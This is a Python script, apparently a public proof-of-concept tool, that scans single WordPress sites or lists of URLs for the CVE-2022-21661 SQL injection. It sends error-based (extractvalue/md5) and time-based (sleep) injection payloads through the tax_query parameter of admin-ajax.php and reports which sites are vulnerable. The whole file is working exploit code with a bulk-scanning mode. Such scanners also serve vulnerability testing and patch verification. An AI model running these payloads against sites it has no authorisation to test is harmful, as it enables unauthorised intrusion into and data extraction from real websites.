main.py

import requests, hashlib, random, argparse, os
from urllib.parse import urlparse
parser = argparse.ArgumentParser(
                    prog='main.py',
                    description='Identify CEV-2022-21661 in Wordpress instances.',
                    epilog='by sealldeveloper')
parser.add_argument('-u', '--url',help='A single URL to check.')
parser.add_argument('-f', '--file',help='A list of URLs to check.')
args=parser.parse_args()
if not args.url and not args.file:
    parser.print_help()
elif args.url and args.file:
    print('Only either -f (--file) or -u (--url) can be used!')
else:
    if args.url:
        url=args.url
        print('Attempting to locate CVE-2022-21661...')
        url=urlparse(url)
        r0 = requests.get(f'{url.scheme}://{url.netloc}/wp-admin/admin-ajax.php', headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"})
        if r0.status_code == 400 and '0' in r0.text:
            randNum = str(random.randint(1234567890987654321,9999999999999999999)).encode('utf-8')
            data='{"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) and extractvalue(rand(),concat(0x5e,md5(' + str(randNum) + '),0x5e))#"]}}}'
            r1 = requests.post(f'{url.scheme}://{url.netloc}/wp-admin/admin-ajax.php', data={"action":"test","data":data}, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"})
            if r1.status_code == 200 and str(hashlib.md5(randNum).hexdigest()) in r1.text:
                print('Vulnerable!')
            else:
                print('Failed on MD5, testing time based query...')
                data = '{"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) or (select sleep(5))#"]}}}'
                r2 = requests.post(f'{url.scheme}://{url.netloc}/wp-admin/admin-ajax.php', data={"action":"test","data":data}, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"})
                if r2.elapsed.total_seconds() >= 5 and r2.status_code == 200:
                    print('Vulnerable!')
                else:
                    print('Not Vulnerable! (Failed after checking for CVE using 2 PoC\'s)')
        else:
            print('Not Vulnerable! (Failed at admin-ajax check)')
    if args.file:
        if os.path.exists(args.file):
            with open(args.file) as f:
                urls=f.read().split('\n')
                count=0
                urls=list(filter(None, urls))
                for url in urls:
                    count+=1
                    if 'http://' in url or 'https://' in url:
                        url=urlparse(url)
                        print(f'Attempting to locate CVE-2022-21661 on URL {count} of {str(len(urls))} ({url.geturl()})...')
                        r0 = requests.get(f'{url.scheme}://{url.netloc}/wp-admin/admin-ajax.php')
                        if r0.status_code == 400 and '0' in r0.text:
                            randNum = str(random.randint(1234567890987654321,9999999999999999999)).encode('utf-8')
                            data='{"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) and extractvalue(rand(),concat(0x5e,md5(' + str(randNum) + '),0x5e))#"]}}}'
                            r1 = requests.post(f'{url.scheme}://{url.netloc}/wp-admin/admin-ajax.php', data={"action":"test","data":data}, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"})
                            if r1.status_code == 200 and str(hashlib.md5(randNum).hexdigest()) in r1.text:
                                print(f'[{count}/{str(len(urls))}] Vulnerable!')
                            else:
                                print(f'[{count}/{str(len(urls))}] Failed on MD5, testing time based query...')
                                data = '{"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) or (select sleep(5))#"]}}}'
                                r2 = requests.post(f'{url.scheme}://{url.netloc}/wp-admin/admin-ajax.php', data={"action":"test","data":data}, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"})
                                if r2.elapsed.total_seconds() >= 5 and r2.status_code == 200:
                                    print(f'[{count}/{str(len(urls))}] Vulnerable!')
                                else:
                                    print(f'[{count}/{str(len(urls))}] Not Vulnerable! (Failed after checking for CVE using 2 PoC\'s)')
                        else:
                            print(f'[{count}/{str(len(urls))}] Not Vulnerable! (Failed at admin-ajax check)')
                    else:
                        print(f'[{count}/{str(len(urls))}] Invalid URL: {url}')